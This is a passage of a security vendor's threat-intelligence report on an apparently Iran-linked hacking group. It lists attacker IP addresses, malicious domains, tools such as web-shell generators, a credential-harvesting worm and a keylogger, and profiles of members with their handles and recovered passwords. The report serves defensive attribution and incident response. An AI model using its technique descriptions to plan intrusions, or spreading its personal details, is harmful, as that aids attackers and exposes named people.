 726. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 727. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 728. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 729. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 730. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 731. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 732. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 733. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 734. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 735. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 736. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 737. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 738. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 739. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 740. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 741. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 742. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 743. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 744. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 745. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 746. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 747.  
 748.  
 749. [ PG-17 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 750.  
 751.  
 752.  
 753. [CYLANCE                                                                                  #OPCLEAVER]
 754.  
 755.  
 756. ATTRIBUTION
 757.  
 758. Despite today’s trend toward attacker attribution, we believe it offers little real benefit to the
 759. day-to-day cyber defender. However, in this report we offer our observations on the sources of
 760. Operation Cleaver in order to benefit those that rely on attribution such as Law Enforcement.
 761.  
 762. Operation Cleaver is believed to consist of at least 20  hackers and developers, collaborating on
 763. projects and missions to support Iranian interests. Many of the targets were predominately
 764. English-speaking and a majority of the team members were capable of reading and writing in English.
 765. We present evidence that this team is operating, at least in part, out of Iran and in the interests
 766. of Iran. The skills and behavior of the Operation Cleaver teams are consistent with, and in one case
 767. surpasses, Iran’s cyber capabilities as we know  them today.
 768.  
 769.  
 770. For a complete list of IPs and domains related to this campaign, please refer to the Indicators of
 771. Compromise section.
 772.  
 773. ATTACKER IP ADDRESSES
 774.  
 775. Figure 4: The logo of the Army of the Guardians of the Islamic Revolution, also known as the Islamic
 776. Revolutionary Guard Corps (IRGC).
 777.  
 778. Over the course of multiple incident response engagements related to Operation Cleaver, we were able
 779. to identify a small set of IP addresses which were commonly used during the initial stages of an attack.
 780.  
 781. The IP address 78.109.194.114 served as a source for one of the primary attackers.  They were
 782. observed conducting SQL injections, controlling backdoors, as well as exfiltrating information using
 783. this address, and the address appears in multiple software configurations recovered from staging
 784. servers over a period of time.
 785.  
 786. GeoIP Location: Iran
 787. Net block: 78.109.194.96 - 78.109.194.127
 788. Owner: Tarh Andishan
 789. Email: tarh.andishan(at)yahoo.com Phone: +98-21-22496658
 790. NIC-Handle: TAR1973-RIPE
 791.  
 792. [ PG-18 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 793.  
 794.  
 795.  
 796. [CYLANCE                                                                                  #OPCLEAVER]
 797.  
 798.  
 799. This IP address was also observed in multiple software configurations. This particular net block was
 800. used over an extended period of time, indicating these were under the Cleaver team’s physical control.
 801. Additionally, prior netblocks used by the same team demonstrated to us that this wasn’t simply a
 802. case of proxying or “island hopping”. For more information see the Tarh Andishan section of this report.
 803.  
 804. The IP address 159.253.144.209 was a source for a secondary attacker in various compromises. They
 805. were observed conducting SQL injection attacks. While this IP was this registered in the Netherlands,
 806. we believe they used Softlayer’s Citrix demo environment to launch these attacks which is consistent
 807. with proxying or “island hopping”.
 808.  
 809. GeoIP Location: Netherlands
 810. Net block: 159.253.144.208 - 159.253.144.223
 811. ASN: Softlayer Technologies, Inc.
 812. IP Location: Netherlands, Amsterdam with Iranian sourcing.
 813.  
 814. ATTACKER DOMAINS
 815.  
 816. A number of Cleaver’s attack methods require a persistent server. In many cases, these servers were
 817. referenced by domain names. The following malicious domains are operated by this organization and are
 818. grouped by the registrant’s email address.
 819.  
 820. davejsmith200(at)outlook.com
 821. *       Teledyne-Jobs.com
 822. *       DownloadsServers.com
 823. *       NorthropGrumman.net
 824. *       MicrosoftMiddleAst.com
 825.  
 826. azlinux73(at)gmail.com
 827. *       MicrosoftServerUpdate.com
 828. *       WindowsSecurityUpdate.com
 829. *       WindowsServerUpdate.com
 830.  
 831. domain(at)netafraz.com
 832. *   EasyResumeCreatorPro.com
 833. *       MicrosoftWindowsResources.com
 834.  
 835. salman.ghazikhani(at)outlook.com
 836. *       Doosan-Job.com
 837.  
 838. btr.8624(at)yahoo.com
 839. *       GoogleProductUpdate.net
 840. *       WindowsCentralUpdate.com
 841. *       WindowsUpdateServer.com
 842. *       DriverCenterUpdate.com
 843.  
 844. msnhst(at)microsoft.com
 845. *       MicrosoftWindowsUpdate.net
 846.  
 847.  
 848. As is typical with malicious domains, the Whois data for most of these domains contained falsified
 849. information.
 850.  
 851. We managed to obtain a large collection of the internally developed tools used by the Cleaver team,
 852. many of which were developed by its members. Due to operational security failures, these tools
 853. contain information that provided us insight into their organization and operations.
 854.  
 855. [ PG-19 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 856.  
 857.  
 858.  
 859. [CYLANCE                                                                                  #OPCLEAVER]
 860.  
 861. TOOLS & SOFTWARE
 862.  
 863. Shell Creator 2
 864.  
 865. In the tool named Shell Creator 2, there are three main components. The creator generates an ASPX web
 866. shell using user input as well as a collection of templates. The web shell could then be installed
 867. via xp_cmdshell, or any other method which would grant the attacker write access. The web shell is
 868. accessible by the shell client directly.
 869.  
 870. The shell client is a portion of Shell Creator 2 that was not designed to be run on a compromised
 871. computer. We originally located it on a staging server being utilized for multiple attacks as well
 872. as a tool for sharing data between members of the organization’s team.
 873.  
 874. The shell client, which is developed in Java and is easily decompiled, is a simple interface with a
 875. feature to protect the operator from making a critical mistake. When executed, and before any
 876. connection to an instance of the web shell is initiated, the shell client communicates with
 877. freegeoip.net in order to get the external IP address of the current user. The country of origin is
 878. then shown to the user, to inform them of what country it appears they are connecting from. The
 879. assumed purpose of this feature is to ensure that a proper proxy is in use, and the real origin of
 880. the attacker is not revealed.
 881.  
 882. After decompiling the shell client, we found the following code segment controlling the display of
 883. this IP location information.
 884.  
 885. [EWWW SCREENCAP!]
 886. Figure 5: Java source code showing how Shell Creator 2 distinguishes between a source IP address
 887. coming from Iran (red) versus any other country (green).
 888.  
 889. This code handles the XML response from freegeoip.net, and displays the information as different
 890. colors based on different attributes. For instance, if the string “ERROR” is in the
 891. response, the text is displayed with the color magenta. If the string IRAN is in the response, the
 892. text is displayed with the color red. It should be noted that no other country name contains the
 893. substring IRAN.
 894.  
 895. [ PG-20 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 896.  
 897.  
 898.  
 899. [CYLANCE                                                                                  #OPCLEAVER]
 900.  
 901.  
 902. Shell Creator 2 (cont.)
 903.  
 904. [EWWW SCREENCAP!]
 905. Figure 6: Shell Creator 2 alerts the user in red when the IP being used can be sourced to Iran.
 906.  
 907. [EWWW SCREENCAP!]
 908. Figure 7: Shell Creator 2 notifies the user in green when their source IP address is not Iran.
 909.  
 910.  
 911. Net Crawler
 912.  
 913. Net Crawler is a tool developed in C# that exhibits worm-like behavior in order to gather cached
 914. credentials from any and all accessible computers on an infected network. This is done with Windows
 915. Credential Editor (WCE) and Mimikatz in combination with PsExec. Different versions of this malware
 916. contain ASCII art which names the authoring group as Zhoupin (in “leetspeak” as “Zh0up!n”).
 917.  
 918. ________   __         __                   __            
 919. /\_____  \ /\ \      /'__`\                /\ \            
 920. \/____//'/'\ \ \___ /\ \/\ \  __  __  _____\ \ \    ___    
 921.      //'/'  \ \  _ `\ \ \ \ \/\ \/\ \/\ '__`\ \ \ /' _ `\  
 922.     //'/'___ \ \ \ \ \ \ \_\ \ \ \_\ \ \ \L\ \ \_\/\ \/\ \
 923.     /\_______\\ \_\ \_\ \____/\ \____/\ \ ,__/\/\_\ \_\ \_\
 924.     \/_______/ \/_/\/_/\/___/  \/___/  \ \ \/  \/_/\/_/\/_/
 925.                                         \ \_\              
 926.                                          \/_/              
 927.  
 928.             Net_Crawler verion 1.0  (;) !
 929.                        
 930. Figure 8: Net Crawler version 1.0 has ASCII art showing the use of “Zh0up!n” in the campaigns tools.
 931.  
 932.  ________   __         __    
 933. /\_____  \ /\ \      /'__`\  
 934. \/____//'/'\ \ \___ /\ \/\ \  
 935.      //'/'  \ \  _ `\ \ \ \ \
 936.     //'/'___ \ \ \ \ \ \ \_\ \
 937.     /\_______\\ \_\ \_\ \____/
 938.     \/_______/ \/_/\/_/\/___/
 939.                              
 940.             Net_CR verion 2.8  (;) !
 941.  
 942. Figure 9: Updated ASCII art found in Net Crawler tool shows a version of “Zh0up!n” shortened to simply “Zh0”.
 943.  
 944.  
 945. For more information on Net Crawler, see the Tactics, Techniques and Procedures section.
 946.  
 947.  
 948. [ PG-21 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 949.  
 950.  
 951.  
 952. [CYLANCE                                                                                  #OPCLEAVER]
 953.  
 954. TinyZBot
 955.  
 956. TinyZBot is a bot written in C# and developed by the Cleaver team. It is the longest developed malware
 957. family discovered by this group, and has been used in campaigns for close to two years. How it operates
 958. can vary greatly from version to version. For a detailed technical analysis of TinyZBot, see the
 959. Tactics, Techniques and Procedures section. As TinyZBot is developed in C#, many versions can be
 960. decompiled to code very similar to their originals, including names of namespaces. Many versions
 961. were obfuscated with a legitimate tool for developers named SmartAssembly, which makes the recovery
 962. of some names implausible.
 963.  
 964. We obtained multiple versions from which we were able to recover many of the original names of
 965. variables and namespaces. In a number of these samples, the primary namespace for TinyZBot  
 966. is named Zhoupin_Cleaver. In every version of TinyZBot that is not obfuscated, there is a code base
 967. referred to as Cleaver. This code base is also shared in other malware developed by this organization,
 968. such as Csext.
 969.  
 970. PrivEsc
 971.  
 972. PrivEsc is a blatant plagiarism of an existing exploit for Microsoft Windows released in January 2010
 973. called MS10-015, “Vulnerabilities in Windows Kernel Could Allow Escalation of Privilege”, popularly
 974. known as the KiTrap0D exploit which was released publicly. The Cleaver team clearly modified the
 975. source code and compiled a new version. The only detectable modification was to change the original
 976. author’s name to instead display the following:
 977.  
 978.           Zhopin Exploit Team
 979.  
 980. This is not the only case of this team relabeling others’ work as their own.
 981.  
 982. Logger Module
 983.  
 984. Logger module is a component of the PVZ (PVZ is shorthand for Parviz, one of the members of the
 985. Cleaver team) bot tool chain. When executed, it will capture the user’s keystrokes and save them
 986. to a location which PVZ bot then exfiltrates. The logger module binary’s file description value is
 987. the following:
 988.  
 989.           ye file khube DG. ba in ham kari nadashte bashin
 990.  
 991. Roughly translated from Persian, this text says:
 992.  
 993.           DG is a good file, don’t bother with this
 994.  
 995. [ PG-22 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 996.  
 997.  
 998.  
 999. [CYLANCE                                                                                  #OPCLEAVER]
 1000.  
 1001. Logger Module (cont.)
 1002.  
 1003. This text could potentially be a note intended to stay internal, or could be an attempt to persuade
 1004. an unsuspecting victim to assume the file is not malicious. The Product Name value is GOOD FILE.
 1005. For more information on the PVZ bot tool chain, see the Tactics, Techniques, and Procedures section.
 1006.  
 1007. CCProxy
 1008.  
 1009. CCProxy is a publicly available proxy server for Windows, which can handle a variety of protocols. We
 1010. do not believe that this organization was involved in the development or modification of CCProxy, but
 1011. they have been observed using it. We recovered a CCProxy configuration, which exposed various
 1012. operational details.
 1013.  
 1014. The configuration allowed for remote connections, limited by a username as well as a limited IP range.
 1015. The username was User-001, which is the default value. The limited IP range covered one IP: 78.109.194.114.
 1016.  
 1017. This IP address is located in Iran, and is owned by Tarh Andishan.
 1018.  
 1019. The configuration also indicates which address the CCProxy server should listen on for incoming
 1020. connections such as web (80) and mail (25).
 1021.  
 1022. [EWWW SCREENCAP!]
 1023.  
 1024. Figure 10 (above): CCProxy configuration file using the hardcoded IP address registered to Tarh Andishan.
 1025. [EWWW SCREENCAP!]
 1026.  
 1027. Figure 11 (left): CCProxy configuration file showing the use of web and mail as listening ports.
 1028.  
 1029. [ PG-23 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1030.  
 1031.  
 1032.  
 1033. [CYLANCE                                                                                  #OPCLEAVER]
 1034.  
 1035. NMAP Log
 1036.  
 1037. Log output from the network port scanning application NMAP was recovered from a staging server. This
 1038. log was generated during the usage of the nbrute utility, which brute-forces network credentials and
 1039. relies on NMAP to do so. The header of this NMAP log indicates that the computer used to run
 1040. nbrute/nmap was set to Iran Daylight Time at the time of execution.
 1041.  
 1042.  
 1043.                 Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time
 1044.  
 1045. With no known victims located in Iran, it is likely that this was executed on an attacker’s computer,
 1046. and not on a victim’s computer.
 1047.  
 1048. Squid Configuration
 1049.  
 1050. A configuration file for a Squid proxy server was recovered.
 1051.  
 1052. [EWWW SCREENCAP!]
 1053.  
 1054. Figure 12: Squid configuration file showing the use of Tarh Andishan’s IP address.
 1055.  
 1056.  
 1057. The net range of 78.109.194.114/28 was inserted into the allowed local networks with an RFC comment
 1058. appended in order to make it look like it was part of the default configuration. It is likely this
 1059. is the same reason a /28 net range was used, in order to not look like it was intended to only allow
 1060. one IP. This would give the same access to resources accessible from the Squid proxy server to this
 1061. Iranian IP address.
 1062.  
 1063.  
 1064. TARH ANDISHAN
 1065.  
 1066. Tarh Andishan is listed as the registrant for a number of small net blocks based upon the email address
 1067. tarh.andishan(at)yahoo.com. The net blocks appear to rotate over time and registrant information is
 1068. altered to accommodate ongoing operations and avoid potential public exposure.
 1069.  
 1070. [ PG-24 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1071.  
 1072.  
 1073.  
 1074. [CYLANCE                                                                                  #OPCLEAVER]
 1075.  
 1076.  
 1077. TARH ANDISHAN (cont.)
 1078.  
 1079. The networks are included below as well as the last time that net block was observed as active.
 1080.  
 1081.  
 1082. * 78.109.194.96/27 - Current
 1083. * 217.11.17.96/28 - 10/22/2014
 1084. * 81.90.144.104/29 - 10/5/2014
 1085. * 31.47.35.0/24 – 11/2012
 1086.  
 1087. There are many seemingly legitimate Tarh Andishan related companies inside Tehran, but strong connections
 1088. to Iranian backing have been difficult to prove definitively. “Tarh Andishan” is often translated as
 1089. “Thinkers”, “Innovators” and “Inventors”.
 1090.  
 1091. The net blocks above have strong associations with state-owned oil and gas companies. These companies
 1092. have current and former employees who are ICS experts.
 1093.  
 1094. Tarh Andishan has been suspected in the past of launching attacks in the interest of Iran. The
 1095. operators of the blog IranRedLine.org, which comments on Iran’s nuclear weapons efforts, has mentioned
 1096. in multiple posts having been the target of debilitating brute-force authentication attacks from IP
 1097. addresses registered to the same Tarh Andishan team found in Cleaver.
 1098.  
 1099. In one of IranRedLine.org’s blog posts8, the author speculates on Tarh Andishan’s involvement with the
 1100. Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and
 1101. Research; however, the phone number listed under the registrant contact information has yet to be
 1102. completely validated.
 1103.  
 1104.  
 1105. [EWWW SCREENCAP!]
 1106.  
 1107. Figure 13: This image from IranRedLine.org demonstrates Tarh Andishan’s probably fabricated Whois
 1108. address to the proximity to Iran’s SPND (Organization of Defensive Innovation and Research).
 1109.  
 1110.  
 1111. [ PG-25 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1112.  
 1113.  
 1114.  
 1115. [CYLANCE                                                                                  #OPCLEAVER]
 1116.  
 1117. MEMBERS
 1118.  
 1119. During this investigation, we were able to compile a considerable amount of information on some of
 1120. the members of this organization. The following profiles were built from reverse engineering, code
 1121. analysis, open source intelligence, incident response and forensics work. Personally identifiable
 1122. information about these members is not being shared publicly as it could endanger their lives and
 1123. would be irresponsible.
 1124.  
 1125. Parviz
 1126.  
 1127. Parviz is a developer who worked on a variety of projects, and was primarily active in 2013. His
 1128. development skillset is based around his ability to develop in C/C++. He has been observed using
 1129. Visual Studio 2010, and his tools are written exclusively for Windows. Some of his tools were found
 1130. to be packed with ASPack.
 1131.  
 1132. Parviz is the primary developer of the PVZ bot and multiple parts of its tool chain. Parviz is likely
 1133. associated with the PVZ bot as his name in hardcoded into the PDB file paths.
 1134.  
 1135. The PVZ tool chain includes a variety of functionality, such as HTTP command and control
 1136. communications with an ASPX server-side component, a denial of service tool they developed, and the
 1137. public project named XYNTService used to run ordinary applications as services.
 1138.  
 1139. PDBs
 1140.  
 1141. * C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\ Release\BotManager.pdb
 1142. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\ Release\socket-test.pdb
 1143. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\ XYNTServiceProject\XYNTServiceProject\Debug\
 1144. XYNTService.pdb
 1145. * C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\ Release\SendModule.pdb
 1146.  
 1147.  
 1148. [ PG-26 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1149.  
 1150.  
 1151.  
 1152. [CYLANCE                                                                                  #OPCLEAVER]
 1153.  
 1154. Nesha
 1155.  
 1156. Nesha is one of the offensive members of this organization. Nesha was seen in breaches involving SQL
 1157. injection as well as other techniques. Nesha often utilized web-based backdoors developed in ASPX,
 1158. PHP as well as ColdFusion. A copy of an MS08-067 exploit developed in Python was recovered in which
 1159. Nesha shamelessly replaced the original author’s name with his own.
 1160.  
 1161. Nesha’s passwords very commonly include own handle. His passwords were frequently stored as hashes in
 1162. backdoors, but common hash cracking methods were able to recover the plaintext versions. His observed
 1163. password use is as follows:
 1164.  
 1165. * nesha nesha used as password in ColdFusion backdoors
 1166. * NeshaNesha12 used as password in ASPX backdoors.
 1167. * nesha123 was found as a password in a recovered credential file with unknown association
 1168.  
 1169. Cylance observed Nesha participating in compromises involving the following techniques:
 1170.  
 1171. * SQL injection
 1172. * Web backdoors
 1173. * Cached credential dumping
 1174.  
 1175. Nesha has additionally been identified using a variety of internally developed tools as well as the
 1176. following publicly available tools:
 1177.  
 1178. * Cain & Abel
 1179. * PsExec
 1180. * PLink
 1181. * NetCat
 1182.  
 1183. Alireza
 1184.  
 1185. Alireza appears to be one of the senior developers of this organization. His tools are commonly
 1186. developed in C++, Java, and C# (desktop and ASPX). These tools are often support tools, either
 1187. monitoring the activity of other tools or supplementing the function of other tools gathering
 1188. information during the infiltration process. Alireza’s code appears to be reused internally on projects
 1189. such as TinyZBot. Alireza appears to be using a version control system for his code, and  it is likely
 1190. that others are using the same system. Based on the paths, the version control system in use is likely
 1191. Apache’s Subversion. Use of a version control system is indicative of code sharing, but the use of an
 1192. older system like Subversion, along with other evidence, suggests there is not a large amount of
 1193. collaboration on projects and likely one developer working on each project at a time. This is not
 1194. behavior typical of a professional development team.
 1195.  
 1196. [ PG-27 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1197.  
 1198.  
 1199.  
 1200. [CYLANCE                                                                                  #OPCLEAVER]
 1201.  
 1202. Alireza (cont.)
 1203.  
 1204. Alireza’s C# tools include the following techniques:
 1205.  
 1206. *       Querying Windows Management Instrumentation Command-line (WMIC)
 1207. *       Cached credential dumping
 1208. *       Generating ASPX shells
 1209. *       Encryption
 1210. *       Process enumeration
 1211.  
 1212. Alireza’s Java tools include the following techniques:
 1213.  
 1214. *       HTTP communications
 1215. *       GUI development
 1216.  
 1217. Alireza’s C++ tools include the following techniques:
 1218.  
 1219. *       WinPcap interface
 1220. *       ARP poisoning
 1221. *       HTTP communications
 1222. *       SMB communications
 1223.  
 1224. PDBs
 1225.  
 1226. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\IDCSercive\trunk\Release\kagent.pdb
 1227. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\PcapServiceInstaller\Release\
 1228.         PcapServiceInstaller.pdb
 1229. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\AntiVirusDetectorConsole\AntiVirusDetectorConsole\
 1230.         obj\x86\Release\ AntiVirusDetectorConsole.pdb
 1231. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\mimikatzWrapper\mimikatzWrapper\obj\x86\Debug\
 1232.         mimikatzWrapper.pdb
 1233. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\ShellCreator2\ShellCreator2\obj\x86\Debug\
 1234.         ShellCreator2.pdb
 1235. *       c:\Users\alireza\Documents\Visual Studio 2012\Projects\BackDoorLogger\BackDoorLogger\obj\Debug\
 1236.         BackDoorLogger.pdb
 1237.  
 1238.  
 1239. [ PG-28 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1240.  
 1241.  
 1242.  
 1243. [CYLANCE                                                                                  #OPCLEAVER]
 1244.  
 1245. kaJ
 1246.  
 1247. kaJ is a .NET developer, and has only been observed working in C#. He has less English language
 1248. proficiency than others in the organization, and likely has a supplemental role during compromises.
 1249. He has been observed developing tools which cater to specific challenges in a compromise. His notable
 1250. project was named Net Crawler, and a technical analysis of this tool can be found in the Tactics,
 1251. Techniques and Procedures section. Thanks to a recovered test configuration for Net Crawler, we were
 1252. able to determine that kaJ’s development computer has the name dev-castle, where he has the username
 1253. kaJ and the password oaolrJ@vad. kaJ is believed to be the creator of the Zhoupin ASCII art displayed
 1254. in Net Crawler.
 1255.  
 1256. kaJ’s projects include the following techniques.
 1257.  
 1258. *       Interfacing with multiple cached credential dumping tools
 1259. *       Interfacing with PsExec
 1260. *       Worming behavior
 1261.  
 1262. Jimbp
 1263.  
 1264. Jimbp is a .NET developer with minimal experience. His projects appear to be supplemental to TinyZBot
 1265. and are very simplistic. It is believed he is the developer of the project Binder_1. This project was
 1266. a simple malware binder which required manual configuration when compiling. His other work included
 1267. creating a new service wrapper for TinyZBot.
 1268.  
 1269. PDBs
 1270.  
 1271. *       c:\Users\Jimbp\Desktop\Binder_1\Binder_1\obj\x86\Release\Setup.pdb
 1272. *       c:\Users\Jimbp\Desktop\Binder_1 - for cleaver\Binder_1\obj\x86\ Release\Setup.pdb
 1273. *       c:\Users\Jimbp\Documents\Visual Studio 2013\Projects\ TestForInstallingService\
 1274.         TestForInstallingService\obj\Release\ TestForInstallingService.pdb
 1275.  
 1276. [ PG-29 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1277.  
 1278.  
 1279.  
 1280. [CYLANCE                                                                                  #OPCLEAVER]
 1281.  
 1282. TEAMS
 1283.  
 1284. Of course many associated Iranian hacker teams have been identified in public and private security
 1285. circles. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber
 1286. Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many
 1287. others9.
 1288.  
 1289. However, even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber
 1290. Army (botnets), Ashiyane (SQL injection) and Syrian Electronic Army (phishing and RATs), we believe
 1291. this is largely the work of a new team. Some connections to Ashiyane were discovered in our
 1292. investigations including a reference to hussein1363, who had prior ties to the hacker group.
 1293. Additional connections between team members and individuals exist but are predominantly speculative
 1294. and have only been shared with law enforcement.
 1295.  
 1296. Ultimately we believe the Cleaver team is a mix of existing team members and new recruits pulled
 1297. from the universities in Iran.
 1298.  
 1299.  
 1300. [ PG-30 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1301.  
 1302.  
 1303.  
 1304. [CYLANCE                                                                                  #OPCLEAVER]
 1305.  
 1306. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 1307. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 1308. %#%%%%%%%%@@@%%%@@#%%%%%%%%            TACTICS, TECHNIQUES       %@@@@#%%%%%%%%((%#&@%@@@@#%%%%%%%%
 1309. %@@@@#%%%%%%%%((%#&@ @@))%%               & PROCEDURES           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%
 1310. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 1311. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 1312. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 1313. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 1314. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 1315. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 1316. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 1317. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 1318. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 1319. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 1320. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 1321. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 1322. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 1323. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 1324. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 1325. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 1326. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 1327. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 1328. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
